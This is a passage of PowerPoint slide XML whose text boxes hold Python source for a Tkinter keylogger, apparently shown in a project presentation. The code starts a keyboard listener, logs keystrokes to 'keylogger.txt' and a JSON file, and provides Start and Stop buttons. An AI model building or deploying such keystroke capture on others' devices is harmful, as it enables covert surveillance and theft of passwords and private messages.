              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">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r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{706462CE-42E3-1026-3BAD-37D9226805AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956335" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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keys = keys + str(key)</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>():</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    global listener</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    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>():</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    global listener</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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root = Tk()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
